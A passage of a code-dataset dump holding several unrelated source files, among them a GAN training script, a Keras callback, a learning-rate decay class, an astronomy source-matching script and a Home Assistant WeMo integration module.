\nnp.random.seed(args.seed)\ntorch.manual_seed(args.seed)\ntorch.cuda.manual_seed(args.seed)\n\n###############################################################################\n# Load data\n###############################################################################\n# load pretraiend models and vocabs\nchar_ae_params, char_word2idx, char_args = load_ckpt(args.char_ckpt)\nword_ae_params, word_word2idx, word_args = load_ckpt(args.word_ckpt)\n\n# create corpus\nchar_vocab = Dictionary()\nchar_vocab.load_from_word2idx(char_word2idx)\nword_vocab = Dictionary()\nword_vocab.load_from_word2idx(word_word2idx)\n\ncorpus = CADCorpus(args.data_path,\n maxlen=args.maxlen,\n char_vocab=char_vocab,\n word_vocab=word_vocab,\n lowercase=args.lowercase,\n )\n\n# save arguments\nif not os.path.exists(args.save):\n os.makedirs(args.save)\n\nlogger.info(\"Vocabulary Size: char vocab={}, word vocab={}\".format(len(char_word2idx), len(word_word2idx)))\n\n# exp dir\ncreate_exp_dir(os.path.join(args.save), ['train_cadgan.py', 'models.py', 'utils.py'],\n dict=(char_word2idx, word_word2idx), options=args)\n\nlogger.info(str(vars(args)))\n\n\n###############################################################################\n# Build the models\n###############################################################################\n\nchar_ae = Seq2Seq(emsize=char_args.emsize,\n nhidden=char_args.nhidden,\n ntokens=char_args.ntokens,\n nlayers=char_args.nlayers,\n noise_r=char_args.noise_r,\n hidden_init=char_args.hidden_init,\n dropout=char_args.dropout)\n\nchar_ae.load_state_dict(char_ae_params)\n\nword_ae = Seq2Seq(emsize=word_args.emsize,\n nhidden=word_args.nhidden,\n ntokens=word_args.ntokens,\n nlayers=word_args.nlayers,\n noise_r=word_args.noise_r,\n hidden_init=word_args.hidden_init,\n dropout=word_args.dropout)\n\nword_ae.load_state_dict(word_ae_params)\n\nD = MLP_D(input_dim=args.nhidden, output_dim=1, arch_layers=args.arch_d)\nG = MLP_G(input_dim=args.nhidden, output_dim=args.nhidden, noise_dim=args.z_size, arch_layers=args.arch_g)\nif args.finetune_ae:\n logger.info(\"AE will be fine-tuned\")\n optimizer_D = optim.Adam(list(D.parameters()) + list(char_ae.parameters()) + list(word_ae.parameters()),\n lr=args.lr_gan_d,\n betas=(args.beta1, 0.999))\n optimizer_G = optim.Adam(list(G.parameters()) + list(char_ae.parameters()) + list(word_ae.parameters()),\n lr=args.lr_gan_g,\n betas=(args.beta1, 0.999))\nelse:\n logger.info(\"AE will not be fine-tuned\")\n optimizer_D = optim.Adam(D.parameters(),\n lr=args.lr_gan_d,\n betas=(args.beta1, 0.999))\n optimizer_G = optim.Adam(G.parameters(),\n lr=args.lr_gan_g,\n betas=(args.beta1, 0.999))\n\nlogger.info(char_ae)\nlogger.info(word_ae)\nlogger.info(D)\nlogger.info(G)\n\nif torch.cuda.is_available():\n logger.info(\"Running on GPU\")\n char_ae = char_ae.cuda()\n word_ae = word_ae.cuda()\n D = D.cuda()\n G = G.cuda()\nelse:\n logger.info(\"Running on CPU\")\n\n###############################################################################\n# Training code\n###############################################################################\ndef validate_disc(data_batches):\n # Turn on evaluation mode which disables dropout.\n char_ae.eval()\n word_ae.eval()\n D.eval()\n\n total_correct = 0\n total_count = 0\n total_loss = 0.0\n\n for i, batch in enumerate(data_batches):\n # + samples\n short_form, short_lengths = batch['short']\n long_form, long_lengths = batch['long']\n context, context_lengths = batch['context']\n flong_form, flong_lengths = batch['fake_long']\n\n if torch.cuda.is_available():\n short_form = short_form.cuda()\n short_lengths = short_lengths.cuda()\n long_form = long_form.cuda()\n long_lengths = long_lengths.cuda()\n context = context.cuda()\n context_lengths = context_lengths.cuda()\n flong_form = flong_form.cuda()\n flong_lengths = flong_lengths.cuda()\n\n short_encoding = char_ae(short_form, short_lengths, noise=False, encode_only=True)\n long_encoding = char_ae(long_form, long_lengths, noise=False, encode_only=True)\n context_encoding = word_ae(context, context_lengths, noise=False, encode_only=True)\n flong_encoding = char_ae(flong_form, flong_lengths, noise=False, encode_only=True)\n\n # energy of real/fake examples\n energy_pos = D(short_encoding.detach(), long_encoding.detach(), context_encoding.detach())\n energy_neg = D(short_encoding.detach(), flong_encoding.detach(), context_encoding.detach())\n\n total_correct += torch.lt(energy_pos, energy_neg).sum().item()\n total_count += short_lengths.size(0)\n\n logger.info(\"current accuracy = %d/%d = %.6f\" % (total_correct, total_count, float(total_correct)/float(total_count)))\n\n return total_loss/float(total_count) , float(total_correct)/float(total_count), total_correct, total_count\n\n\ndef train_GAN(batch, train_G):\n char_ae.train()\n word_ae.train()\n D.train()\n optimizer_D.zero_grad()\n\n # + samples\n short_form, short_lengths = batch['short']\n long_form, long_lengths = batch['long']\n context, context_lengths = batch['context']\n noise = Variable(torch.ones(args.batch_size, args.z_size).normal_(0, 1))\n\n if torch.cuda.is_available():\n short_form = short_form.cuda()\n short_lengths = short_lengths.cuda()\n long_form = long_form.cuda()\n long_lengths = long_lengths.cuda()\n context = context.cuda()\n context_lengths = context_lengths.cuda()\n noise = noise.cuda()\n\n short_encoding = char_ae(short_form, short_lengths, noise=False, encode_only=True).detach()\n long_encoding = char_ae(long_form, long_lengths, noise=False, encode_only=True).detach()\n context_encoding = word_ae(context, context_lengths, noise=False, encode_only=True).detach()\n # fake_long_encoding = char_ae(flong_form, flong_lengths, noise=False, encode_only=True)\n\n fake_long_encoding = G(noise, short_encoding, context_encoding)\n\n # energy of real/fake examples\n real_D_loss = D(short_encoding, long_encoding, context_encoding).mean()\n fake_D_loss = D(short_encoding, fake_long_encoding.detach(), context_encoding).mean()\n\n # compute the loss and back-propagate it\n D_loss = fake_D_loss - real_D_loss\n\n penalize_score = False\n penalize_gradient = True\n lamda = 10\n score_penalty_loss = 0.0\n gradient_penalty_loss = 0.0\n\n if penalize_score:\n score_penalty_loss = score_penalty(D, real_data=(short_encoding, long_encoding, context_encoding))\n D_loss += (lamda * score_penalty_loss)\n score_penalty_loss = score_penalty_loss.item()\n\n if penalize_gradient:\n gradient_penalty_loss = gradient_penalty(D,\n real_data=(short_encoding, long_encoding, context_encoding),\n fake_data=(short_encoding, fake_long_encoding.detach(), context_encoding))\n D_loss += (lamda * gradient_penalty_loss)\n gradient_penalty_loss = gradient_penalty_loss.item()\n\n # final disc cost\n D_loss.backward()\n optimizer_D.step()\n\n if train_G:\n noise = Variable(torch.ones(args.batch_size, args.z_size).normal_(0, 1))\n if torch.cuda.is_available():\n noise = noise.cuda()\n fake_long_encoding = G(noise, short_encoding, context_encoding)\n G_loss = D(short_encoding, fake_long_encoding, context_encoding).mean()\n (-G_loss).backward()\n optimizer_G.step()\n\n return D_loss.item(), real_D_loss.item(), fake_D_loss.item(), score_penalty_loss, gradient_penalty_loss\n\n\ndef train():\n # gan: preparation\n if args.niters_gan_schedule != \"\":\n gan_schedule = [int(x) for x in args.niters_gan_schedule.split(\"-\")]\n else:\n gan_schedule = []\n niter_gan = 1\n\n global global_step\n global_step = 0\n\n best_valid_acc = None\n eval_batch_size = args.batch_size\n\n impatience = 0\n for epoch in range(1, args.epochs+1):\n # re-batchify every epoch to shuffle the train and generate fake pairs\n train_data = corpus.batchify(corpus.train, args.batch_size, shuffle=True)\n train_data = corpus.add_fake_labels(train_data, field=\"long\")\n\n test_data = corpus.batchify(corpus.test, eval_batch_size, shuffle=False)\n test_data = corpus.add_fake_labels(test_data, field=\"long\")\n\n logger.info(\"Epoch %d\" % epoch)\n logger.info(\"Loaded data!\")\n logger.info(\"Training data! \\t: %d examples, %d batches\" % (len(corpus.train), len(train_data)))\n logger.info(\"Test data! \\t: %d examples, %d batches\" % (len(corpus.test), len(test_data)))\n\n # update gan training schedule\n if epoch in gan_schedule:\n niter_gan += 1\n logger.info(\"GAN training loop schedule: {}\".format(niter_gan))\n\n D_losses, w_dists, real_energy, fake_energy, SP_losses, GP_losses = [], [], [], [], [], []\n epoch_start_time = time.time()\n start_time = time.time()\n\n # train\n for i in range(len(train_data)):\n # update global_step here, might be used in TensorboardX later\n global_step += 1\n\n D_loss, real_D_loss, fake_D_loss, score_penalty_loss, gradient_penalty_loss\\\n = train_GAN(train_data[i], train_G=(i % args.niters_gan_g == 0))\n\n D_losses.append(D_loss)\n w_dists.append((real_D_loss-fake_D_loss))\n real_energy.append(real_D_loss)\n fake_energy.append(fake_D_loss)\n SP_losses.append(score_penalty_loss)\n GP_losses.append(gradient_penalty_loss)\n\n if global_step % args.log_interval == 0:\n elapsed = time.time() - start_time\n logger.info('| step {:3d} | epoch {:3d} | {:5d}/{:5d} batches | ms/batch {:5.2f} | '\n 'D-loss {:5.2f} | Estimated W-dist {:5.2f} | '\n 'real energy {:8.2f} | fake energy {:8.2f} | '\n 'score penalty {:8.2f} | gradient penalty {:8.2f}'.format(\n global_step, epoch, i, len(train_data), elapsed * 1000 / args.log_interval,\n np.average(D_losses), np.average(w_dists),\n np.average(real_energy), np.average(fake_energy),\n np.average(SP_losses), np.average(GP_losses)\n )\n )\n D_losses, w_dists, real_energy, fake_energy, SP_losses, GP_losses = [], [], [], [], [], []\n start_time = time.time()\n\n if global_step % args.save_every == 0:\n save_ckpt(ckpt_name=\"ckpt_epoch%d\" % epoch, save_dir=args.save,\n model_dict={\"char_ae\": char_ae, \"word_ae\": word_ae, \"D\": D, \"G\": G},\n args=args, vocab=(char_vocab.word2idx, word_vocab.word2idx))\n\n if global_step % args.valid_every == 0:\n # validate\n valid_loss, valid_acc, total_correct, total_count = validate_disc(test_data)\n logger.info('| Validation {:3d} | time: {:5.2f}s | test loss {:5.2f} | '\n 'acc {:3.3f} | #(correct) = {} | #(all) = {}'\n .format(epoch, (time.time() - epoch_start_time),\n valid_loss, valid_acc, total_correct, total_count))\n\n if best_valid_acc is None or valid_acc > best_valid_acc:\n impatience = 0\n best_valid_acc = valid_acc\n logger.info(\"New saving model: epoch {}, best acc={}.\".format(epoch, best_valid_acc))\n save_ckpt(ckpt_name=\"ckpt_epoch%d-best@%f\" % (epoch, best_valid_acc),\n save_dir=args.save,\n model_dict={\"char_ae\": char_ae, \"word_ae\": word_ae, \"D\": D, \"G\": G},\n args=args, vocab=(char_vocab.word2idx, word_vocab.word2idx)\n )\n else:\n logger.info(\"Epoch {}, acc={}.\".format(epoch, valid_acc))\n\n if not args.no_earlystopping and epoch >= args.min_epochs:\n impatience += 1\n if impatience > args.patience:\n logger.info(\"Ending training\")\n sys.exit()\n\nif __name__ == '__main__':\n train()\n","sub_path":"cad/train_cadgan.py","file_name":"train_cadgan.py","file_ext":"py","file_size_in_byte":14712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"317073488","text":"import keras\n\nclass CallbackSaver(keras.callbacks.Callback):\n\n def __init__(self, path, min):\n super().__init__()\n self.path = path\n self.i = 0\n self.min = min\n self.lastAccuracy = 0\n\n def on_epoch_end(self, epoch, logs={}):\n self.i += 1\n accuracy = logs['acc']\n if accuracy > self.lastAccuracy and self.min < self.i:\n self.model.save(self.path + '-' + str(self.i) + '.h5py')\n return\n\n","sub_path":"CallbackSaver.py","file_name":"CallbackSaver.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"1990838","text":"import tensorflow as tf\nimport numpy as np\n\nimport decay.base\n\n\nclass Step(decay.base.Decay):\n def __init__(self, lr=0.1, decay_rate=0.1, decay_steps=[0.3, 0.6]):\n self.lr = lr\n self.decay_rate = decay_rate\n self.decay_steps = decay_steps\n\n def decay(self, global_step, total_steps):\n global_step = tf.cast(global_step, tf.float32)\n learning_rates = [self.lr * self.decay_rate ** i\n for i, ratio in enumerate(self.decay_steps)]\n pred_fn_pairs = [\n (tf.less(global_step / total_steps, ratio), lambda lr=lr: tf.constant(lr, tf.float32))\n for ratio, lr in zip(self.decay_steps, learning_rates)]\n return tf.case(\n pred_fn_pairs,\n default=lambda: tf.constant(self.lr * self.decay_rate ** len(self.decay_steps), tf.float32))\n\n def decay_numpy(self, global_step, total_steps):\n for i, ratio in enumerate(self.decay_steps):\n if global_step / total_steps < ratio: return self.lr * self.decay_rate ** i\n return self.lr * self.decay_rate ** len(self.decay_steps)","sub_path":"src/decay/step.py","file_name":"step.py","file_ext":"py","file_size_in_byte":1103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"645907907","text":"import os,threading\nimport subprocess\n\nclass CloudMonkey:\n def __init__(self):\n self.path=os.path.abspath(\".\")\n\n def get_devices(self):\n list=[]\n devices=subprocess.check_output(\"adb devices\").decode().strip().split(\"\\r\\n\")\n for i in range(1,len(devices)):\n udid=devices[i].split(\"\\t\")[0]\n","sub_path":"thirdProject/cloudTest_framework/cloudTest_monkey.py","file_name":"cloudTest_monkey.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"259807199","text":"import os\r\nimport pybel\r\nimport rmgpy.molecule\r\nfrom rmgpy.molecule.converter import from_ob_mol\r\nfrom rmgpy.molecule.draw import MoleculeDrawer\r\n\r\ndef toRMGmol(OBMol):\r\n rmg_mol = from_ob_mol(rmgpy.molecule.molecule.Molecule(), OBMol)\r\n return rmg_mol\r\n\r\ndef readXYZ(path):\r\n mol = next(pybel.readfile('xyz', path))\r\n return mol.OBMol\r\n \r\ndef molDrawer():\r\n dirs = os.listdir('/mnt/d/reactions')\r\n for i in dirs:\r\n dir_path = os.path.join(os.path.join('/mnt/d/reactions', i), 'product.xyz')\r\n OBMol = readXYZ(dir_path)\r\n rmg_mol = toRMGmol(OBMol)\r\n _path = '/mnt/d/molecules/{}.png'.format(i)\r\n MoleculeDrawer().draw(rmg_mol, file_format='png', target=_path)\r\n \r\nmolDrawer()","sub_path":"script/molDrawer.py","file_name":"molDrawer.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"552593488","text":"\n\"\"\"\nConfiguration file for code execution. Used to set variables so that the backend can know what it's embedded in, whether Sage is available, and whether the user wants to use Sage for a given session.\n\"\"\"\n\n\nEMBEDDED_MODE = {\"frontend\":\"sagecell\",\n \"enable_sage\":False,\n \"sage_mode\":False}\n\n\n \n\n \n","sub_path":"sagecell_exec_config.py","file_name":"sagecell_exec_config.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"113855623","text":"import sys, glob, logging, argparse\nfrom source import Source\nimport numpy as np\nimport astropy.units as u\nfrom astropy.coordinates import match_coordinates_sky, Angle, SkyCoord\nfrom astropy.table import Table\nimport matplotlib.pyplot as plt\nfrom matplotlib.patches import Ellipse\nimport matplotlib as mpl\nfrom matplotlib. gridspec import GridSpec\nglobal version\nversion = 'draft'\n\ndef match(ch1, CHANNELS):\n # ch [FLUX/MAG] [SOURCE] [source data]\n sources = [Source( ch1[0][i], ch1[1][i]) for i in range(len(ch1[0]))]\n log_c = 2\n for channel in CHANNELS:\n logging.info('MATCHING CHANNEL %d'%log_c)\n idx, d2d, d3d = single_match(ch1[0][:,0:2], channel[0][:,0:2])\n bad_match = np.where(d2d.arcsec > 1.0)[0]\n for i, IDX in enumerate(idx):\n if i not in bad_match:\n index = np.where(idx==IDX)[0]\n if d2d[i].arcsec == min(d2d[index].arcsec):\n sources[i].append_channel( channel[0][IDX], channel[1][IDX])\n sources[i].status = True\n log_c+=1\n\n sources = [source for source in sources if source.status]\n tmp=0\n for source in sources: \n tmp+=float(source.confidence)\n source.convert_to_nan()\n logging.info('%d Sources : %f full confidence'%(len(sources), tmp/len(sources)))\n\n return sources\n\ndef single_match(cat1, cat2):\n ra1 = Angle(cat1[:,0], unit=u.deg)\n dec1= Angle(cat1[:,1], unit=u.deg)\n cat1 = SkyCoord(ra=ra1, dec=dec1)\n \n ra2 = Angle(cat2[:,0], unit=u.deg)\n dec2= Angle(cat2[:,1], unit=u.deg)\n cat2 = SkyCoord(ra=ra2, dec=dec2)\n return match_coordinates_sky(cat1, cat2)\n\ndef further_cropping(source):\n source.convert_to_nan()\n if np.where(np.isnan(source.flux_data[0]))[0] != np.where(np.isnan(source.flux_data[1]))[0]:\n return False\n if source.radial < 0.009: return False\n #if source.radial > 0.058: return False\n #if not source.confidence: return False\n else: return True\n\ndef get_shape(sourcelist):\n return(2,3)\n\ndef plot_variability(sourcelist, std):\n logging.info('PLOTTING VARIABILITY')\n shape = get_shape(sourcelist)\n fig, axes = plt.subplots(shape[0],shape[1], sharex=True, sharey=True)\n new = np.zeros( (len(sourcelist), shape[0], shape[1], 2 ))\n v_count= np.zeros( (len(sourcelist), shape[0], shape[1]))\n labels = np.empty((shape[0], shape[1]), dtype=\"S7\")\n\n for s, source in enumerate(sourcelist):\n ix, iy = 0,0\n for i in range(source.nEps):\n for j in range(source.nEps):\n if source.variabilitymask[0,i,j]:\n if s==0: \n labels[ix,iy] = (\"%d:%d\"%(i+1,j+1))\n\n #v_count[s,ix,iy] = source.v_count[i,j]\n v_count[s,ix,iy] = source.variable\n new[s,ix,iy] = source.variability_MATRIX[:,i,j]\n iy += 1\n if iy == shape[1]:\n iy=0\n ix +=1\n colours = {2:'r', 1:'c', 0:'k'}\n for i in range(shape[0]):\n for j in range(shape[1]):\n #axes[i,j].scatter(new[:,i,j,0], new[:,i,j,1], marker='*', s=3, c=[ colours[count[i,j]] for count in v_count])\n axes[i,j].scatter(new[:,i,j,0], new[:,i,j,1], marker='*', s=5, c=[ colours[s.variable] for s in sourcelist])\n axes[i,j].add_patch( Ellipse(xy=(0,0), width=( 6*std[0]), height=( 6*std[1]),fc='None', edgecolor='b'))\n axes[i,j].add_patch( Ellipse(xy=(0,0), width=( 4*std[0]), height=( 4*std[1]),fc='None', edgecolor='b'))\n axes[i,j].add_patch( Ellipse(xy=(0,0), width=( 2*std[0]), height=( 2*std[1]),fc='None', edgecolor='b'))\n axes[i,j].annotate(labels[i,j], (15,18))\n axes[i,j].minorticks_on()\n axes[i,j].tick_params(direction='in', which='both', top=True, right=True, bottom=True, left=True)\n axes[i,j].set_xlim(0, 22)\n axes[i,j].set_ylim(0, 22)\n plt.subplots_adjust(wspace=.03, hspace=.03)\n fig.text(0.03, 0.5, r'|Var$_{[4.5]}$|', rotation=90)\n fig.text(0.5, 0.03, r'|Var$_{[3.6]}$|')\n fig.savefig('../figures/variability.png',format='png', dpi=300)\n fig.savefig('../figures/variability.eps',format='eps', dpi=300)\n fig.savefig('../figures/variability.ps',format='ps', dpi=300)\n\n\ndef plot_colourMAG(sourcelist):\n logging.info('Plotting Colour Mag diagram')\n colours={0:'k', 1:'c', 2:'r'}\n\n sizes = {0:1, 1:9, 2:9}\n markers={0:'.', 1:'*', 2:2}\n #fig, (ax1, ax2) = plt.subplots(1,2, sharey=True, squeeze=True)\n f1 = plt.figure()\n ax1 = plt.subplot(111)\n x=np.zeros(len(sourcelist))\n for i,s in enumerate(sourcelist):\n x[i] = s.mag[0] - s.mag[1]\n\n ax1.scatter( x, [np.mean(s.mag_data[0][s.NANMAP]) for s in sourcelist], marker='*', s=[ sizes[s.variable] for s in sourcelist], c=[ colours[s.variable] for s in sourcelist])\n ax1.set_ylabel([3.6])\n ax1.set_xlabel('[3.6]-[4.5]')\n ax1.invert_yaxis() \n ax1.minorticks_on()\n ax1.tick_params(which='both', direction='in', top=True, right=True, left=True, bottom=True, width=1)\n\n f2 = plt.figure()\n ax2 = plt.subplot(111)\n\n ax2.scatter( x, [np.mean(s.mag_data[1][s.NANMAP]) for s in sourcelist], marker='*', s=[ sizes[s.variable] for s in sourcelist],c=[ colours[s.variable] for s in sourcelist])\n plt.ylabel([4.5])\n ax2.set_xlabel('[3.6]-[4.5]')\n ax2.invert_yaxis() \n ax2.minorticks_on()\n ax2.tick_params(which='both', direction='in', top=True, right=True, left=True, bottom=True, width=1)\n #fig.subplots_adjust(hspace=.0, wspace=0.01)\n\n #if version == 'draft':\n #fig.text(0.5, 0.5, 'DRAFT', alpha=0.3, color='r', fontsize=50)\n f1.savefig('../figures/Colour_mag_36.png', dpi=300)\n f2.savefig('../figures/Colour_mag_45.png', dpi=300)\n\n\ndef plot_population(sourcelist):\n logging.info('Plotting Population Histogram')\n fig=plt.figure()\n ax = plt.subplot(111)\n vals =[ s.mag[0]-s.mag[1] for s in sourcelist] \n ax.hist(vals, bins=20, range=(-4,4), color='skyblue', ec='blue', label='Total Population')\n variables = [s.mag[0]-s.mag[1] for s in sourcelist if s.variable]\n ax.hist(variables, bins=20, range=(-4,4), color='xkcd:watermelon', ec='red', label='High Confidence Variables')\n ax.axvline(np.nanmean(vals), ls='--', c='r', label='Mean Difference')\n ax.set_xlabel('Magnitude Difference ([3.6]-[4.5])')\n ax.set_ylabel('Number of Stars')\n ax.minorticks_on()\n ax.tick_params(which='both', direction='in', top=True, right=True, bottom=True, left=True)\n plt.legend() \n if version == 'draft':\n fig.text(0.5, 0.5, 'DRAFT', alpha=0.3, color='r', fontsize=50)\n fig.savefig('../figures/variable_CMAG.png',dpi=300)\n\n\nif __name__=='__main__':\n mpl.rc('font', size=10)\n #plt.rc('text', usetex=True)\n \n logging.basicConfig(level='INFO', format=\"\\x1b[1;%dm\" % (32) + '%(message)s' + \"\\x1b[0m\")\n parser = argparse.ArgumentParser(description='parse some args')\n parser.add_argument('-ch', action='append', dest=\"channel_data\", default = [],help='Channel FLUX and MAG files', type=str)\n parser.add_argument('-fc', help='Conduct further cropping on sources', action='store_true')\n\n args = parser.parse_args()\n\n if not args.channel_data: quit('Need to include channel files')\n data = np.empty((len(args.channel_data), 2), dtype=list)\n for i in range(len(args.channel_data)):\n filenames = sorted(glob.glob(args.channel_data[i]))\n logging.info(filenames)\n data[i][0] = np.genfromtxt(filenames[0], skip_header=1, delimiter=',')\n data[i][1] = np.genfromtxt(filenames[1], skip_header=1, delimiter=',')\n # data [CHANNEL] [FLUX/MAG] [SOURCE] [source data value (ra,dec,etc) ]\n sources = match(data[0] , data[1:]) # thats matching every channel to channel 1 \n if args.fc: \n logging.info(\"Comensing Further Cropping\")\n sources = [s for s in sources if further_cropping(s)]\n logging.info('Getting Source Variability')\n\n #setup\n \n \n \n for source in sources:\n source.get_variability_MATRIX()\n \n '''\n S = sources[0]\n stdev = np.zeros(np.shape(S.variabilitymask))\n for ch in range(S.nCh):\n for i in range(S.nEps):\n for j in range(S.nEps):\n if S.variabilitymask[ch,i,j]:\n stdev[ch,i,j] = np.nanstd([s.variability_MATRIX[ch,i,j] for s in sources])\n print(stdev)\n for source in sources:\n source.is_variable(stdev)\n '''\n stdev = [0,0]\n for i in range(2):\n tmp = np.zeros((len(sources)))\n for s, source in enumerate(sources):\n tmp[s] = np.nanmean( source.variability_MATRIX[i][np.where(source.variabilitymask[i])])\n stdev[i] = np.std(tmp)\n\n print(stdev)\n no_high = 0\n no_low = 0\n for source in sources:\n source.is_variable_simple(stdev)\n if source.variable == 2: no_high +=1\n if source.variable == 1: no_low +=1\n print(no_high, no_low)\n\n\n #plot_variability(sources, stdev)\n\n if False:\n s = sources[0]\n s.get_variability_MATRIX()\n s.build_row(names=True)\n print(s.row_names)\n\n catalog = Table(names=s.row_names)\n i=0\n logging.info('Building output table (expect delays)')\n for source in sources:\n source.build_row(i)\n catalog.add_row(source.row_data)\n if i%300==0: \n print('\\x1b[2K%s\\r'%i)\n i+=1\n print(catalog)\n catalog.write('master.csv', overwrite=True)\n logging.info(\"Creating Region file\") \n with open('master.reg','w')as reg:\n for src in sources:\n\n d1=int(src.ra/15)\n m1=int((src.ra-d1)*60)\n s1=(src.ra-d1-m1/60.)*3600\n\n d2=int(src.dec)\n m2=int((src.dec-d2)*60)\n s2=(src.dec-d2-m2/60.)*3600\n c = SkyCoord(ra=src.ra*u.degree, dec=src.dec*u.degree)\n ra=c.ra.hms\n dec=c.dec.dms\n reg.write('circle(%d:%d:%f, %d:%d:%f ,5)\\n'%(ra.h, ra.m, ra.s, dec.d, dec.m, dec.s))\n\n\n\n\n #plot_colourMAG(sources)\n\n\n\n\n\n plt.show()\n","sub_path":"src/restruct.py","file_name":"restruct.py","file_ext":"py","file_size_in_byte":10126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"599284418","text":"\"\"\"Classes shared among Wemo entities.\"\"\"\nimport asyncio\nimport logging\nfrom typing import Any, Dict, Optional\n\nimport async_timeout\nfrom pywemo import WeMoDevice\n\nfrom homeassistant.helpers.entity import Entity\n\nfrom .const import DOMAIN as WEMO_DOMAIN\n\n_LOGGER = logging.getLogger(__name__)\n\n\nclass WemoEntity(Entity):\n \"\"\"Common methods for Wemo entities.\n\n Requires that subclasses implement the _update method.\n \"\"\"\n\n def __init__(self, device: WeMoDevice) -> None:\n \"\"\"Initialize the WeMo device.\"\"\"\n self.wemo = device\n self._state = None\n self._available = True\n self._update_lock = None\n\n @property\n def name(self) -> str:\n \"\"\"Return the name of the device if any.\"\"\"\n return self.wemo.name\n\n @property\n def available(self) -> bool:\n \"\"\"Return true if switch is available.\"\"\"\n return self._available\n\n def _update(self, force_update: Optional[bool] = True):\n \"\"\"Update the device state.\"\"\"\n raise NotImplementedError()\n\n async def async_added_to_hass(self) -> None:\n \"\"\"Wemo device added to Home Assistant.\"\"\"\n # Define inside async context so we know our event loop\n self._update_lock = asyncio.Lock()\n\n async def async_update(self) -> None:\n \"\"\"Update WeMo state.\n\n Wemo has an aggressive retry logic that sometimes can take over a\n minute to return. If we don't get a state within the scan interval,\n assume the Wemo switch is unreachable. If update goes through, it will\n be made available again.\n \"\"\"\n # If an update is in progress, we don't do anything\n if self._update_lock.locked():\n return\n\n try:\n with async_timeout.timeout(self.platform.scan_interval.seconds - 0.1):\n await asyncio.shield(self._async_locked_update(True))\n except asyncio.TimeoutError:\n _LOGGER.warning(\"Lost connection to %s\", self.name)\n self._available = False\n\n async def _async_locked_update(self, force_update: bool) -> None:\n \"\"\"Try updating within an async lock.\"\"\"\n async with self._update_lock:\n await self.hass.async_add_executor_job(self._update, force_update)\n\n\nclass WemoSubscriptionEntity(WemoEntity):\n \"\"\"Common methods for Wemo devices that register for update callbacks.\"\"\"\n\n @property\n def unique_id(self) -> str:\n \"\"\"Return the id of this WeMo device.\"\"\"\n return self.wemo.serialnumber\n\n @property\n def device_info(self) -> Dict[str, Any]:\n \"\"\"Return the device info.\"\"\"\n return {\n \"name\": self.name,\n \"identifiers\": {(WEMO_DOMAIN, self.unique_id)},\n \"model\": self.wemo.model_name,\n \"manufacturer\": \"Belkin\",\n }\n\n @property\n def is_on(self) -> bool:\n \"\"\"Return true if the state is on. Standby is on.\"\"\"\n return self._state\n\n async def async_added_to_hass(self) -> None:\n \"\"\"Wemo device added to Home Assistant.\"\"\"\n await super().async_added_to_hass()\n\n registry = self.hass.data[WEMO_DOMAIN][\"registry\"]\n await self.hass.async_add_executor_job(registry.register, self.wemo)\n registry.on(self.wemo, None, self._subscription_callback)\n\n async def async_will_remove_from_hass(self) -> None:\n \"\"\"Wemo device removed from hass.\"\"\"\n registry = self.hass.data[WEMO_DOMAIN][\"registry\"]\n await self.hass.async_add_executor_job(registry.unregister, self.wemo)\n\n def _subscription_callback(\n self, _device: WeMoDevice, _type: str, _params: str\n ) -> None:\n \"\"\"Update the state by the Wemo device.\"\"\"\n _LOGGER.info(\"Subscription update for %s\", self.name)\n updated = self.wemo.subscription_update(_type, _params)\n self.hass.add_job(self._async_locked_subscription_callback(not updated))\n\n async def _async_locked_subscription_callback(self, force_update: bool) -> None:\n \"\"\"Handle an update from a subscription.\"\"\"\n # If an update is in progress, we don't do anything\n if self._update_lock.locked():\n return\n\n await self._async_locked_update(force_update)\n self.async_write_ha_state()\n","sub_path":"homeassistant/components/wemo/entity.py","file_name":"entity.py","file_ext":"py","file_size_in_byte":4234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"382882314","text":"def GameBoard(gameData):\n height= gameData[\"height\"]\n width= gameData[\"width\"]\n snakes= gameData[\"snakes\"]\n food= gameData[\"food\"]\n walls= gameData[\"walls\"]\n gold= gameData[\"gold\"]\n gameBoard = [['E' for x in range(height)] for x in range(width)] \n #gameBoard[1][4] = 'E';\n for i in range(len(snakes)):\n for j in range(len(snakes[i][\"coords\"])):\n x = snakes[i][\"coords\"][j][0]\n y = snakes[i][\"coords\"][j][1]\n if (snakes[i][\"id\"] == '2daa46ee-4880-4285-8572-eeaf52dba551'):\n \tif (j == 0):\n gameBoard[x][y] = 'H'\n \telse:\n gameBoard[x][y] = 'I'\n else:\n gameBoard[x][y] = 'S'\n for i in range(len(food)):\n x = food[i][0]\n y = food[i][1]\n gameBoard[x][y] = 'F'\n for i in range(len(walls)):\n x = walls[i][0]\n y = walls[i][1]\n gameBoard[x][y] = 'W'\n for i in range(len(gold)):\n x = gold[i][0]\n y = gold[i][1]\n gameBoard[x][y] = 'G'\n return gameBoard\n\n","sub_path":"app/gameBoardMatrix.py","file_name":"gameBoardMatrix.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"211143866","text":"load(\"@drake//tools/workspace:github.bzl\", \"github_archive\")\n\ndef stduuid_repository(\n name,\n mirrors = None):\n github_archive(\n name = name,\n repository = \"mariusbancila/stduuid\",\n commit = \"3afe7193facd5d674de709fccc44d5055e144d7a\",\n sha256 = \"e11f9bf30c7f9c03d8e9a3a3fd7fe016eb5d8d9b89a2fe2c11b5f049e1d97916\", # noqa\n build_file = \":package.BUILD.bazel\",\n mirrors = mirrors,\n )\n","sub_path":"tools/workspace/stduuid/repository.bzl","file_name":"repository.bzl","file_ext":"bzl","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} 